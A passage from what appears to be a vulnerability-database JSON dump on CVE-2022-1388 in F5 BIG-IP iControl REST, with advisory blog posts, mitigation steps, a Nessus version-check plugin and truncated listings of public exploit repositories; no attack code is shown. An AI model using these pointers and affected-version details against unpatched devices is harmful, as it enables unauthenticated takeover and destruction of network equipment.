Range.\n\nThe vulnerability listed as [CVE-2022-1388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388>) allows attackers to bypass authentication on internet-exposed iControl interfaces, potentially executing arbitrary commands, creating or deleting files, or disabling services.\n\n## F5 BIG-IP\n\nThe BIG-IP platform by F5 is a family of products covering software and hardware designed around application availability, access control, and security solutions. It is used for various applications like load balancing and application delivery.\n\nOn May 4, 2022 F5 [notified](<https://support.f5.com/csp/article/K23605346>) users of the existence of a vulnerability in BIG-IP iControl REST where undisclosed requests could bypass iControl REST authentication. F5 stated that the vulnerability could allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. The attacker, in other words, could gain complete control over the affected device.\n\n## The vulnerability\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This vulnerability is listed as CVE-2022-1388 and received a [CVSS score](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) of 9.8 out of 10.\n\nF5 added that there is no data plane exposure; this is a control plane issue only. So, not much of a problem if the management plane is not exposed to the public Internet, you would think. 
But since F5 BIG-IP devices are commonly used in enterprises, this vulnerability is a significant risk as it would allow threat actors to exploit the bug to gain initial access to networks and then spread laterally to other devices. And experts estimate based on [online searches](<https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=EXCLUDE&q=services.http.response.html_title%3A+%22BIG-IP%26reg%3B-+Redirect%22+>) there are some 2,500 devices exposed to the Internet.\n\n## Exploits\n\nSoon after the patch, two separate groups of researchers announced on Twitter that they had developed exploits and would publish them soon. Other researchers noticed online scanning was ongoing for BIG IP.\n\nExploits are often found by reverse engineering the changes made by the patch, which is one of the reasons why patches should be applied as soon as possible. Besides assumed reputation damage, this is a reason why vendors and open source maintainers are often hesitant to request a CVE.\n\nThe researchers that created the exploits warned that all admins should immediately update their devices as soon as possible due to the trivial nature of the exploit. Now the ACSC has warned about the existence of a proof of concept, and attempts by malicious actors to exploit this vulnerability on Australian networks. \n\n## Mitigation\n\nA list of vulnerable products and versions can be found in the [F5 KB article](<https://support.f5.com/csp/article/K23605346>). Experts [recommend](<https://isc.sans.edu/diary/28624>) to take Internet-facing devices offline and check if they are safe first, before applying the patches. If an attacker has already planted a backdoor, they can still control the product even after patching.\n\nUntil it is possible to install a fixed version, you can use the following sections as temporary mitigations. 
These mitigations restrict access to iControl REST to only trusted networks or devices, thereby limiting the attack surface.\n\n * [Block iControl REST access through the self IP address](<https://support.f5.com/csp/article/K23605346#proc1>)\n * [Block iControl REST access through the management interface](<https://support.f5.com/csp/article/K23605346#proc2>)\n * [Modify the BIG-IP httpd configuration](<https://support.f5.com/csp/article/K23605346#proc3>)\n\nFor future use, this [F5 BIG-IP Security Cheatsheet](<https://github.com/dnkolegov/bigipsecurity/blob/master/README.md>) is a great resource to make sure your product is configured securely, and that attackers will not have access to the management interface from the Internet.\n\nPlease note that BIG-IP 11 and 12 are vulnerable as well but these are too old to be patched.\n\nStay safe, everyone!\n\nThe post [Update now! F5 BIG-IP vulnerability being actively exploited](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/update-now-exploits-are-active-for-f5-big-ip-vulnerability/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T15:39:17", "type": "malwarebytes", "title": "Update now! 
F5 BIG-IP vulnerability being actively exploited", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-09T15:39:17", "id": "MALWAREBYTES:78681A8703445F3DF21BACB3C703E8D2", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/update-now-exploits-are-active-for-f5-big-ip-vulnerability/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-12T16:55:50", "description": "As we [reported](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/update-now-exploits-are-active-for-f5-big-ip-vulnerability/>) a few days ago, a F5 BIG-IP vulnerability listed as [CVE-2022-1388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388>) is actively being exploited. But now researchers have noticed that attackers aren't just taking control of the vulnerable servers but also making them unusable by destroying the device\u2019s file system.\n\n## F5 BIG-IP\n\nThe BIG-IP platform by F5 is a family of products covering software and hardware designed around application availability, access control, and security solutions. It is used for various applications like load balancing and application delivery.\n\nOn May 4, 2022 F5 [notified](<https://support.f5.com/csp/article/K23605346>) users of the existence of a vulnerability in BIG-IP iControl REST where undisclosed requests could bypass iControl REST authentication. 
F5 said the vulnerability could allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. The attacker, in other words, could gain complete control over the affected device.\n\nSoon after the patch, two separate groups of researchers announced on Twitter that they had developed exploits and would publish them soon. Other researchers noticed online scanning was ongoing for BIG-IP.\n\nDue to the critical nature of the bug, F5 urged admins to apply updates as soon as possible.\n\n## New type of attack\n\nWhile most of the attacks so far were aimed at creating a foothold or gathering information for further attacks, we are now seeing a very different and destructive type of attack.\n\nAt least one group of attackers is sending commands to vulnerable devices that delete the whole F5 file system, which is breaking load balancing and websites.\n\n[_Attackers are wiping vulnerable devices' file systems_](<https://twitter.com/sans_isc/status/1523741896707043328>)\n\nWhile destroying the file system of the device may seem worse than data exfiltration or planting a backdoor at first glance, some researchers are saying it may be a blessing in disguise. The group is making the vulnerable devices unavailable for threat actors that are trying to utilize the more monetizable attack vectors. Most of the original attacks were dropping web shells, which are malicious scripts used by an attacker that allow them to escalate and maintain persistent access on an already compromised web application. (Not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)\n\nThe motives of this threat actor are hard to guess. 
Maybe it\u2019s simply a case of showing off, or an act out of sheer frustration.\n\nBut for those running a vulnerable device this makes the \u201ccan\u2019t patch now, for it will make the device unavailable\u201d argument moot. If this attacker gets to you, the device will be unavailable for much longer than it takes to patch.\n\nStay safe, everyone!\n\nThe post [F5 BIG-IP vulnerability is now being used to disable servers](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/f5-big-ip-vulnerability-is-now-being-used-to-disable-servers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T12:51:25", "type": "malwarebytes", "title": "F5 BIG-IP vulnerability is now being used to disable servers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-12T12:51:25", "id": "MALWAREBYTES:8A7CCD02A4D2FFC47ACB35E63C12DA1D", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/f5-big-ip-vulnerability-is-now-being-used-to-disable-servers/", "cvss": {"score": 7.5, 
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wallarmlab": [{"lastseen": "2022-05-13T12:01:19", "description": "On May 5, 2022, MITRE published [CVE-2022-1388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388>), an authentication bypass vulnerability in the BIG-IP modules affecting the iControl REST component. The vulnerability was assigned a CVSSv3 score of 9.8\n\nThe vulnerability was discovered internally by the F5 security team and there is no evidence of whether it\u2019s exploited publicly. There is no publicly available proof of concept at the time of writing this blog post. Newly discovered BIG-IP vulnerability affects the following product and versions:\n\nBIG-IP (all modules):\n\n * 16.1.0 - 16.1.2\n * 15.1.0 - 15.1.5\n * 14.1.0 - 14.1.4\n * 13.1.0 - 13.1.4\n * 12.1.0 - 12.1.6 (Won\u2019t fix)\n * 11.6.1 - 11.6.5 (Won\u2019t fix)\n\n \n\n## F5 Big-IP Remote Code Execution Detection\n\nDo you want to find out if you are vulnerable to CVE-2022-1388? You might want to take a look at some of the tools we will mention below:\n\nBash script that checks for the existence of CVE-2022-1388 ([https://github.com/jheeree/CVE-2022-1388-checker](<https://github.com/jheeree/CVE-2022-1388-checker>)):\n\n\n\nNuclei template to detect CVE-2022-1388 ([https://github.com/MrCl0wnLab/Nuclei-Template-CVE-2022-1388-BIG-IP-iControl-REST-Exposed](<https://github.com/MrCl0wnLab/Nuclei-Template-CVE-2022-1388-BIG-IP-iControl-REST-Exposed>))\n\n\n\nPatches for the CVE-2022-1388 have been published on F5\u2019s [website](<https://support.f5.com/csp/article/K23605346>). 
You can fix the vulnerability by installing a version listed on the [website](<https://support.f5.com/csp/article/K23605346>).\n\nIf it\u2019s not possible for you to install a fix for now, you can follow the instructions listed on F5\u2019s [website](<https://support.f5.com/csp/article/K23605346>) in the Mitigation section.\n\nWallarm was able to detect the CVE-2022-1388 exploit as 0day automatically with no additional configuration or updates required. The first attack was detected on May 9th, 1:45 am PT.\n\nWhen using Wallarm in blocking mode, these attacks will be automatically blocked. No actions are required.\n\nWhen using a monitoring mode, we suggest creating a virtual patch. Feel free to reach out to [support@wallarm.com](<mailto:support@wallarm.com>) if you need assistance.\n\nThe post [CVE-2022-1388: Critical security vulnerabilities in F5 Big-IP allows attackers to execute arbitrary code](<https://lab.wallarm.com/cve-2022-1388-f5-big-ip-rce/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-06T17:06:26", "type": "wallarmlab", "title": "CVE-2022-1388: Critical security vulnerabilities in F5 Big-IP allows attackers to execute arbitrary code", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-06T17:06:26", "id": "WALLARMLAB:BED32468D036C4C2D5DC502940814368", "href": "https://lab.wallarm.com/cve-2022-1388-f5-big-ip-rce/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-06-15T22:30:10", "description": "The version of F5 Networks BIG-IP installed on the remote host is prior to 13.1.5 / 14.1.4.6 / 15.1.5.1 / 16.1.2.2 / 17.0.0. It is, therefore, affected by a vulnerability as referenced in the K23605346 advisory.\n\n - On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated (CVE-2022-1388)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-05-05T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : BIG-IP iControl REST vulnerability (K23605346)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-16T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/h:f5:big-ip_protocol_security_manager", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL23605346.NASL", "href": "https://www.tenable.com/plugins/nessus/160537", 
"sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K23605346.\n#\n# @NOAGENT@\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160537);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/16\");\n\n script_cve_id(\"CVE-2022-1388\");\n script_xref(name:\"IAVA\", value:\"2022-A-0189\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/31\");\n\n script_name(english:\"F5 Networks BIG-IP : BIG-IP iControl REST vulnerability (K23605346)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of F5 Networks BIG-IP installed on the remote host is prior to 13.1.5 / 14.1.4.6 / 15.1.5.1 / 16.1.2.2 /\n17.0.0. It is, therefore, affected by a vulnerability as referenced in the K23605346 advisory.\n\n - On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior\n to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may\n bypass iControl REST authentication. 
Note: Software versions which have reached End of Technical Support\n (EoTS) are not evaluated (CVE-2022-1388)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K23605346\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5 Solution K23605346.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-1388\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'F5 BIG-IP iControl RCE via REST Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/05\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude('f5_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar version = get_kb_item('Host/BIG-IP/version');\nif ( ! version ) audit(AUDIT_OS_NOT, 'F5 Networks BIG-IP');\nif ( isnull(get_kb_item('Host/BIG-IP/hotfix')) ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/hotfix');\nif ( ! 
get_kb_item('Host/BIG-IP/modules') ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/modules');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar sol = 'K23605346';\nvar vmatrix = {\n 'AFM': {\n 'affected': [\n '16.1.0-16.1.2','15.1.0-15.1.5','14.1.0-14.1.4','13.1.0-13.1.4','12.1.0-12.1.6','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '17.0.0','16.1.2.2','15.1.5.1','14.1.4.6','13.1.5'\n ],\n },\n 'APM': {\n 'affected': [\n '16.1.0-16.1.2','15.1.0-15.1.5','14.1.0-14.1.4','13.1.0-13.1.4','12.1.0-12.1.6','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '17.0.0','16.1.2.2','15.1.5.1','14.1.4.6','13.1.5'\n ],\n },\n 'ASM': {\n 'affected': [\n '16.1.0-16.1.2','15.1.0-15.1.5','14.1.0-14.1.4','13.1.0-13.1.4','12.1.0-12.1.6','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '17.0.0','16.1.2.2','15.1.5.1','14.1.4.6','13.1.5'\n ],\n },\n 'GTM': {\n 'affected': [\n '16.1.0-16.1.2','15.1.0-15.1.5','14.1.0-14.1.4','13.1.0-13.1.4','12.1.0-12.1.6','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '17.0.0','16.1.2.2','15.1.5.1','14.1.4.6','13.1.5'\n ],\n },\n 'LTM': {\n 'affected': [\n '16.1.0-16.1.2','15.1.0-15.1.5','14.1.0-14.1.4','13.1.0-13.1.4','12.1.0-12.1.6','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '17.0.0','16.1.2.2','15.1.5.1','14.1.4.6','13.1.5'\n ],\n },\n 'PEM': {\n 'affected': [\n '16.1.0-16.1.2','15.1.0-15.1.5','14.1.0-14.1.4','13.1.0-13.1.4','12.1.0-12.1.6','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '17.0.0','16.1.2.2','15.1.5.1','14.1.4.6','13.1.5'\n ],\n },\n 'PSM': {\n 'affected': [\n '16.1.0-16.1.2','15.1.0-15.1.5','14.1.0-14.1.4','13.1.0-13.1.4','12.1.0-12.1.6','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '17.0.0','16.1.2.2','15.1.5.1','14.1.4.6','13.1.5'\n ],\n },\n 'WOM': {\n 'affected': [\n '16.1.0-16.1.2','15.1.0-15.1.5','14.1.0-14.1.4','13.1.0-13.1.4','12.1.0-12.1.6','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '17.0.0','16.1.2.2','15.1.5.1','14.1.4.6','13.1.5'\n ],\n }\n};\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n var extra = NULL;\n if (report_verbosity > 0) extra = 
bigip_report_get();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n}\nelse\n{\n var tested = bigip_get_tested_modules();\n var audit_extra = 'For BIG-IP module(s) ' + tested + ',';\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, 'running any of the affected modules');\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-15T16:59:46", "description": "A remote code execution vulnerability exists in the iControl REST API feature of F5's BIG-IP product. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands with root privileges.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-05-09T00:00:00", "type": "nessus", "title": "F5 BIG-IP RCE (CVE-2022-1388)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-12T00:00:00", "cpe": ["cpe:/h:f5:big-ip"], "id": "F5_CVE-2022-1388.NBIN", "href": "https://www.tenable.com/plugins/nessus/160726", "sourceData": "Binary data f5_cve-2022-1388.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-06-15T20:04:22", "description": "# CVE-2022-1388\nBIG-IP iControl REST vulnerability CVE-2022-1388...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-05T10:35:35", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-15T19:59:21", "id": "1B780B5D-F60A-5066-A44B-253EADDAC5CF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-15T20:03:15", "description": "# CVE-2022-1388\n\n> CVE-2022-1388 F5 BIG-IP iControl REST Auth By...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T10:22:31", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-15T19:59:21", 
"id": "E7FB27A1-5ECC-5541-BE31-7ABC656DFACA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-20T14:02:21", "description": "# CVE-2022-1388\nCVE-2022-1388 Sca...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T19:33:37", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-20T13:27:59", "id": "D133D476-887B-53A8-A831-16AFB83B7038", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-30T14:14:29", "description": "# CVE2022-1388_TestAPI\nA Test API for testin...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T15:34:14", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-26T21:22:13", "id": "0C3BF793-B508-5082-A673-3882A95A6EDF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-11T16:45:47", "description": "# CVE-2022-1388-PocExp\nCVE-2022-1388-PocExp,\u65b0\u589e\u4e86\u591a\u7ebf\u7a0b\n# Usg...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 